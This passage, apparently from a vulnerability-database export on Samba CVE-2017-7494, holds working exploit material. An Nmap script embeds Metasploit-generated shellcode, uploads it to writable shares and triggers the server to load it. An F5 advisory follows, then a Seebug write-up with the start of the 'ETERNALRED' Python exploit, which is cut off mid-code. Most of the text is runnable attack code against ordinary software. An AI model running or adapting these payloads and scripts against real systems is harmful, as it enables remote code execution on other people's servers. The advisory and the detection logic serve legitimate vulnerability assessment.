0x00, 0x0C, 0x00, 0x00, 0x00, 0xF6, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,\n0xF4, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x0B, 0x58, 0x99, 0x52, 0x66, 0x68, 0x2D, 0x63, 0x89,\n0xE7, 0x68, 0x2F, 0x73, 0x68, 0x00, 0x68, 0x2F, 0x62, 0x69, 0x6E, 0x89, 0xE3, 0x52, 0xE8, 0x03,\n0x00, 0x00, 0x00, 0x69, 0x64, 0x00, 0x57, 0x53, 0x89, 0xE1, 0xCD, 0x80,\n}\n\n--linux/x64/exec (CMD=id)\nlocal PAYLOAD_X64 = {\n0x7F, 0x45, 0x4C, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x03, 0x00, 0x3E, 0x00, 0x01, 0x00, 0x00, 0x00, 0x92, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x02, 0x00, 0x40, 0x00, 0x02, 0x00, 0x01, 0x00,\n0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0xBC, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE6, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\n0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x92, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x0B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x6A, 0x3B, 0x58, 0x99, 0x48, 0xBB, 0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x73, 0x68, 0x00,\n0x53, 0x48, 0x89, 0xE7, 0x68, 0x2D, 0x63, 0x00, 0x00, 0x48, 0x89, 0xE6, 0x52, 0xE8, 0x03, 0x00,\n0x00, 0x00, 0x69, 0x64, 0x00, 0x56, 0x57, 0x48, 0x89, 0xE6, 0x0F, 0x05,\n}\n\nPAYLOAD_X86 = string.char(table.unpack(PAYLOAD_X86))\nPAYLOAD_X64 = string.char(table.unpack(PAYLOAD_X64))\n\n-- directories to look through if actual path cannot be queried\nlocal COMMON_DIRS = {\"/volume1/\",\"/volume2/\",\"/volume3/\",\"/volume4/\",\n \"/shared/\",\"/mnt/\",\"/mnt/usb/\",\"/media/\",\"/mnt/media/\",\"/var/samba/\",\n \"/tmp/\",\"/home/\",\"/home/shared/\"}\n\n-- filename used to save into the shared folders\nlocal FILENAME = 'test.so'\n\nlocal payloads = {PAYLOAD_X86, PAYLOAD_X64}\n\n--- Determines whether the version of Samba is vulnerable and sets it in the\n-- table samba_cve. Note that version numbers may not indicate vulnerability\n-- as there are patches released (e.g. for Ubuntu) which did not change the\n-- version of Samba\n--\n-- @param version The string containing the version of Samba\n-- @param samba_cve The vuln table containing information for the results\nlocal function determine_vuln_version(version, samba_cve)\n local major, minor, patch\n major, minor, patch = string.match(version,\"(%d+)%.(%d+)%.(%d+).*\")\n stdnse.debug(\"Major version: %s, Minor version: %s, Patch version: %s\", major, minor, patch)\n major, minor, patch = tonumber(major), tonumber(minor), tonumber(patch)\n\n -- no patches available for 3.5.X and 3.6.X\n if major == 3 and minor >= 5 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n elseif major == 4 then\n if minor < 4 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n -- patched in 4.4.14\n elseif minor == 4 and patch < 14 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n -- patched in 4.5.10\n elseif minor == 5 and patch < 10 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n -- patched in 4.6.4\n elseif minor == 6 and patch < 4 then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n end\n end\nend\n\n--- Finds all writable shares on the target host and stores the name and path\n-- into samba_cve stable, using smb.share_find_writable\n--\n-- @param host The target host\n-- @param samba_cve The vuln table containing information for the results\n-- @return (main_name, main_path) Two strings, containing the name of the main\n-- writable share and its path\nlocal function find_writable_shares(host, samba_cve)\n -- determine if there are writable shares\n local status, main_name, main_path, names\n status, main_name, main_path, names = smb.share_find_writable(host)\n\n -- successful in finding writable share\n if status then\n local msg = string.format(\"Writable share found. \\n Name: %s\", main_name)\n if main_path then\n msg = msg .. string.format(\"\\n Path: %s \", main_path)\n end\n\n -- insert main writable directory with path into check_results\n table.insert(samba_cve.check_results, msg)\n\n -- insert names of other writable shares to extra_info\n if #names > 0 then\n table.insert(samba_cve.extra_info, string.format(\n \"All writable shares:\"))\n end\n for i = 1, #names, 1 do\n table.insert(samba_cve.extra_info, string.format(\" Name: %s\", main_name))\n end\n else\n -- writable share enumeration failed, return error message stored in main_name\n local err = main_name\n table.insert(samba_cve.extra_info, err)\n main_name = nil\n end\n\n -- main_path is C:\\<actual share>\n -- we map it to the equivalent statement in Unix filesystems\n -- i.e. /<actual share>/\n if main_path then\n main_path = \"/\" .. string.sub(main_path, 4) .. \"/\"\n end\n\n return main_name, main_path\nend\n\n--- Check if the suggested workaround \"nt pipe support = no\" was applied on\n-- the target host. The script checks if details can be queried on IPC$\n-- which in a typical case will return details on the IPC, but if the\n-- workaround is applied, an error of 'NT_STATUS_ACCESS_DENIED' is returned\n--\n-- @param host The target host\n-- @param samba_cve The vuln table containing information for the results\n-- @return A boolean indicating the nt pipe support is enabled, which\n-- indicates the workaround was not applied\nlocal function is_ntpipesupport_enabled(host, samba_cve)\n -- do \"nt pipe support = no\" workaround check, in which case\n -- accessing 'IPC$' returns 'NT_STATUS_ACCESS_DENIED'\n local status, result\n status, result = smb.share_get_details(host, 'IPC$')\n\n if status and result['details'] == \"NT_STATUS_ACCESS_DENIED\" then\n samba_cve.state = vulns.STATE.NOT_VULN\n return false\n elseif not status then\n -- error accessing IPC$, present error to user\n local err = result\n table.insert(samba_cve.extra_info, err)\n end\n\n return true\nend\n\n--- Creates candidate paths for common directories of shares\n-- This is method is based off the Metasploit script.\n--\n-- @param share_name Name of the share that you wish to write to\n-- ireturn Array of candidate paths of the shares, never nil\nlocal function enumerate_directories(share_name)\n local candidates = {}\n\n -- enumerate through all locations to find the file\n for i = 1, #COMMON_DIRS, 1 do\n table.insert(candidates, COMMON_DIRS[i])\n table.insert(candidates, COMMON_DIRS[i] .. share_name)\n table.insert(candidates, COMMON_DIRS[i] .. string.upper(share_name))\n table.insert(candidates, COMMON_DIRS[i] .. string.lower(share_name))\n table.insert(candidates, COMMON_DIRS[i] .. string.gsub(share_name, \" \", \"_\"))\n end\n\n return candidates\nend\n\n--- Uploads the payloads in the array into a file each on the writable share.\n-- Because the execution of the payload must match the architecture of the\n-- target system, the function will try to test against each payload from\n-- different architectures. The payloads were generated from Metasploit.\n--\n-- The function will then test if the system is vulnerable by making a NT\n-- Create AndX Request on the IPC$ on the actual path of the file containing\n-- the payload. It will first try to see if the actual path was retrieved\n-- using previously by checking for the path argument. If it is not supplied,\n-- because we do not know where the actual files are stored on the filesystem,\n-- we have to make guesses on common directories. The status returned when\n-- the payload executes is false, indicating that the system is vulnerable.\n--\n-- @param host The target host\n-- @param samba_cve The vuln table containing information for the results\n-- @param payloads An array containing payloads from different architectures\n-- @param name The name of the writable share\n-- @param path The canonical path of the share\nlocal function test_cve2017_7494(host, samba_cve, payloads, name, path)\n local status, result, err, share_name\n local candidates = {}\n\n -- create the files of both payloads on the share\n -- the files are named as follows:\n -- <index><base_filename>\n for i, l_payload in ipairs(payloads) do\n for _, anon in ipairs({true, false}) do\n status, err = smb.file_write(host, l_payload, name,\n tostring(i) .. FILENAME, anon)\n stdnse.debug1(\"Write file status %s , err %s\", status, err)\n if status then break end\n end\n end\n\n -- check if a proper filepath is returned from smb probes and use it\n if path then\n table.insert(candidates, path)\n else\n share_name = string.match(name, \"\\\\\\\\.*\\\\(.*)\") .. '/'\n candidates = enumerate_directories(share_name)\n end\n\n -- try all candidate payloads\n for h = 1, #payloads, 1 do\n local l_filename = tostring(h) .. FILENAME\n -- loop through all common candidate paths\n for i = 1, #candidates, 1 do\n local path = candidates[i] .. l_filename\n local pipe_formats = {\"\\\\\\\\PIPE\\\\\".. path , path}\n -- test both pipe formats for each path\n for j = 1, #pipe_formats, 1 do\n local curr_path = pipe_formats[j]\n -- make an simple SMB connection to IPC$\n local status, smbstate = smb.start_ex(host, true, true, \"\\\\\\\\\" ..\n host.ip .. \"\\\\IPC$\", nil, nil, nil)\n if not status then\n stdnse.debug1(\"Could not connect to IPC$\")\n else\n local overrides = {}\n -- perform NT Create NX Request on candidate file paths\n overrides['file_create_disposition'] = 0x1 -- FILE_OPEN\n overrides['file_create_security_flags'] = 0x0 -- No dynamic tracking, no security context\n\n stdnse.debug1(\"Trying path : %s\", curr_path)\n status, result = smb.create_file(smbstate, curr_path, overrides)\n stdnse.debug1(\"Status: %s, Result: %s\", status, result)\n -- on payload execution, result will be false and server will disconnect\n if not status and string.match(result, \"SMB: ERROR: Server disconnected the connection\") then\n samba_cve.state = vulns.STATE.VULN\n table.insert(samba_cve.check_results,\n \"Exploitation of CVE-2017-7494 succeeded!\")\n return\n end\n end\n end\n end\n end\n if samba_cve.state ~= vulns.STATE.VULN and not path then\n samba_cve.state = vulns.STATE.LIKELY_VULN\n table.insert(samba_cve.check_results,\n 'File written to remote share, but unable to execute payload either due to unknown actual path, or the system may be patched.')\n end\nend\n\naction = function(host,port)\n local port = nmap.get_port_state(host,{number=smb.get_port(host),protocol='tcp'})\n\n local result, stats\n local response = {}\n\n local samba_cve = {\n title = \"SAMBA Remote Code Execution from Writable Share\",\n IDS = {CVE = 'CVE-2017-7494'},\n risk_factor = \"HIGH\",\n scores = {\n CVSSv3 = \"7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\"\n },\n description = [[\nAll versions of Samba from 3.5.0 onwards are vulnerable to a remote\ncode execution vulnerability, allowing a malicious client to upload a\nshared library to a writable share, and then cause the server to load\nand execute it.\n]],\n references = {\n 'https://www.samba.org/samba/security/CVE-2017-7494.html',\n },\n dates = {\n disclosure = {year = '2017', month = '05', day = '24'},\n },\n check_results = {},\n extra_info = {}\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n samba_cve.state = vulns.STATE.NOT_VULN\n\n local check_version = stdnse.get_script_args(SCRIPT_NAME .. \".check-version\") or false\n -- check if they put false or similar\n if check_version and string.lower(check_version) == \"false\" then\n check_version = nil\n end\n\n local version = port.version.version\n\n -- retrieve version of samba using smb.get_os\n if not version then\n local status, result = smb.get_os(host)\n\n if(status == false) then\n return stdnse.format_output(false, result)\n end\n\n -- result.lanmanager contains OS version information\n -- string returned by result.lanmanager looks like Samba 4.3.9-Ubuntu\n -- we only want 4.3.9-Ubuntu\n if string.match(result.lanmanager,\"^Samba \") then\n version = string.match(result.lanmanager,\"^Samba (.*)\")\n else\n return stdnse.format_output(false,\n \"Either versioning failed or samba does not exist on the port!\")\n end\n end\n\n table.insert(samba_cve.check_results,\n string.format(\"Samba Version: %s\",version))\n\n if check_version then\n stdnse.debug(\"Port Version: %s\", port.version.version)\n -- determine if version is vulnerable\n determine_vuln_version(version, samba_cve)\n\n -- The first set of conditions sees if version checking is specified\n -- to speed up checks so only hosts with versions that are likely to be\n -- vulnerable are scanned, the second part of the condition allows\n -- the script to run try the exploit on the samba share regardless\n -- of version. In this case, the latter is the default.\n elseif (check_version and samba_cve == vulns.STATE.LIKELY_VULN) or not check_version then\n local name, path\n -- vulnerability requires library to be written to share\n name, path = find_writable_shares(host, samba_cve)\n stdnse.debug1(\"Writable share name: %s, Path returned: %s\", name, path)\n\n -- do \"nt pipe support = no\" workaround check, which prevents exploitation\n local ntpipe_enabled = is_ntpipesupport_enabled(host, samba_cve)\n\n -- some patches for samba do not affect version numbers\n -- e.g. 2:4.3.11+dfsg-0ubuntu0.16.04.7\n -- in reality they are not vulnerable\n -- patched versions prevents named pipes containing '/'\n -- more information is available on the patch\n -- https://git.samba.org/?p=samba.git;a=blobdiff;f=source3/rpc_server/srv_pipe.c;h=f79fbe26abff1e3a2b3f3a21480196afc09d13b1;hp=39f5fb49ec3c0e011a5c6ad4b7ac60bcf49af05a;hb=02a76d86db0cbe79fcaf1a500630e24d961fa149;hpb=82bb44dd3b7f42b90494294b32f8413a39cb2030\n -- therefore we need to ascertain if the exploit works\n if name and ntpipe_enabled then\n test_cve2017_7494(host, samba_cve, payloads, name, path)\n\n for i, _ in ipairs(payloads) do\n smb.file_delete(host, name, tostring(i) .. FILENAME)\n end\n end\n\n end\n\n return report:make_output(samba_cve)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-04-30T18:21:00", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIn addition to standard mitigation options such as patching, using antivirus programs on endpoints, and using unaffected backups, you may be able to leverage F5 products to provide additional mitigation options in the following non-exhaustive ways:\n\n**BIG-IP LTM**\n\nIf the BIG-IP LTM system is in the network path between clients and Samba servers, use packet filters to block SMB access (tcp/445) from untrusted client IPs and networks.\n\n**BIG-IP AFM**\n\nIf the BIG-IP AFM system is in the network path between clients and Samba servers, use BIG-IP AFM policies to block SMB access (tcp/445) from untrusted client IPs and networks.\n\n**BIG-IP APM**\n\nThe BIG-IP APM system may allow access to SMB shares over full Virtual Private Network (VPN) connections. You may use L4 access control lists (ACLs) to block this access, or permit access only for certain clients.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-05-26T22:08:00", "published": "2017-05-25T20:18:00", "id": "F5:K13551136", "href": "https://support.f5.com/csp/article/K13551136", "title": "Samba remote code execution vulnerability CVE-2017-7494 ", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:57:43", "description": "### A vulnerability overview\n\n#### 1 vulnerability profile\n\nSamba is in the Linux and UNIX systems implement SMB Protocol one software, many IoT devices also use Samba. 2017 5 May 24, Samba released a 4. 6. 4 version, to fix a serious remote code execution vulnerability, the vulnerability number CVE-2017-7494, the attacker can exploit the vulnerability on the target server execute arbitrary code. 2017 year 5 May 25, hdm to the metasploit submitted the vulnerability of exp. 2017 5 March 25 openwrt release for the bug fix patch, many IoT devices also affected by the vulnerability.\n\n#### 2 exploit the conditions\n\n 1. The service end of the shared directory have access permissions.\n 2. The need for the server to write a malicious file and know the file's physical path.\n\n#### 3 impact version\n \n \n Samba 3.5+ <4.6.4 <4.5.10 <4.4.14\n \n\n### Second, the vulnerability reproduction\n\n#### 1 Verify the environment\n\nSamba 4.1.13 Ubuntu 14.04\n\n#### 2 test results\n\nUse metasploit in exp for testing, the results are as follows Fig.  \n\nYou can see, the success of the return of the shell, it gets the permissions and Samba configuration.\n\n#### Third, exploit\n\nThe attacker can through the different ways to upload a malicious file to the server, and then via Samba to load the malicious file to trigger the vulnerability. In actual use, the attacker can through a low-privilege users to upload malicious files to the server, using the vulnerability to access the Samba permissions, they get the permissions and Samba configuration related, it is not recommended to use root user to start the Samba service.\n", "published": "2017-05-25T00:00:00", "type": "seebug", "title": "Samba remote code execution vulnerability(CVE-2017-7494)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93139", "id": "SSV:93139", "sourceData": "\n #! /usr/bin/env python\r\n# Title : ETERNALRED \r\n# Date: 05/24/2017\r\n# Exploit Author: steelo <knownsteelo@gmail.com>\r\n# Vendor Homepage: https://www.samba.org\r\n# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14\r\n# CVE-2017-7494\r\n\r\n\r\nimport argparse\r\nimport os.path\r\nimport sys\r\nimport tempfile\r\nimport time\r\nfrom smb.SMBConnection import SMBConnection\r\nfrom smb import smb_structs\r\nfrom smb.base import _PendingRequest\r\nfrom smb.smb2_structs import *\r\nfrom smb.base import *\r\n\r\n\r\nclass SharedDevice2(SharedDevice):\r\n def __init__(self, type, name, comments, path, password):\r\n super().__init__(type, name, comments)\r\n self.path = path\r\n self.password = password\r\n\r\nclass SMBConnectionEx(SMBConnection):\r\n def __init__(self, username, password, my_name, remote_name, domain=\"\", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):\r\n super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)\r\n\r\n\r\n def hook_listShares(self):\r\n self._listShares = self.listSharesEx\r\n\r\n def hook_retrieveFile(self):\r\n self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix\r\n\r\n # This is maily the original listShares but request a higher level of info\r\n def listSharesEx(self, callback, errback, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n\r\n expiry_time = time.time() + timeout\r\n path = 'IPC$'\r\n messages_history = [ ]\r\n\r\n def connectSrvSvc(tid):\r\n m = SMB2Message(SMB2CreateRequest('srvsvc',\r\n file_attributes = 0,\r\n access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,\r\n share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\r\n oplock = SMB2_OPLOCK_LEVEL_NONE,\r\n impersonation = SEC_IMPERSONATE,\r\n create_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL,\r\n create_disp = FILE_OPEN))\r\n\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)\r\n messages_history.append(m)\r\n\r\n def connectSrvSvcCB(create_message, **kwargs):\r\n messages_history.append(create_message)\r\n if create_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n # The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706]\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 0b 03 10 00 00 00 74 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<I', call_id) + \\\r\n binascii.unhexlify(b\"\"\"\r\nb8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00\r\nc8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88\r\n03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00\r\n2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b\r\n70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00\r\n2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00\r\n01 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))\r\n m.tid = create_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)\r\n messages_history.append(m)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))\r\n\r\n def rpcBindCB(trans_message, **kwargs):\r\n messages_history.append(trans_message)\r\n if trans_message.status == 0:\r\n m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))\r\n m.tid = trans_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')\r\n\r\n def rpcReadCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n\r\n padding = b''\r\n remote_name = '\\\\\\\\' + self.remote_name\r\n server_len = len(remote_name) + 1\r\n server_bytes_len = server_len * 2\r\n if server_len % 2 != 0:\r\n padding = b'\\0\\0'\r\n server_bytes_len += 2\r\n\r\n # The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 00 03 10 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \\\r\n binascii.unhexlify(b\"\"\"4c 00 00 00 00 00 0f 00 00 00 02 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<III', server_len, 0, server_len) + \\\r\n (remote_name + '\\0').encode('UTF-16LE') + padding + \\\r\n binascii.unhexlify(b\"\"\"\r\n02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00\r\n00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))\r\n m.tid = read_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')\r\n\r\n def listShareResultsCB(result_message, **kwargs):\r\n messages_history.append(result_message)\r\n if result_message.status == 0:\r\n # The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n data_bytes = result_message.payload.out_data\r\n\r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)\r\n else:\r\n decodeResults(result_message.tid, kwargs['fid'], data_bytes)\r\n elif result_message.status == 0x0103: # STATUS_PENDING\r\n self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n else:\r\n closeFid(result_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n\r\n def decodeResults(tid, fid, data_bytes):\r\n shares_count = struct.unpack('<I', data_bytes[36:40])[0]\r\n results = [ ] # A list of SharedDevice2 instances\r\n offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants\r\n for i in range(0, shares_count):\r\n results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))\r\n offset += 12\r\n\r\n for i in range(0, shares_count):\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 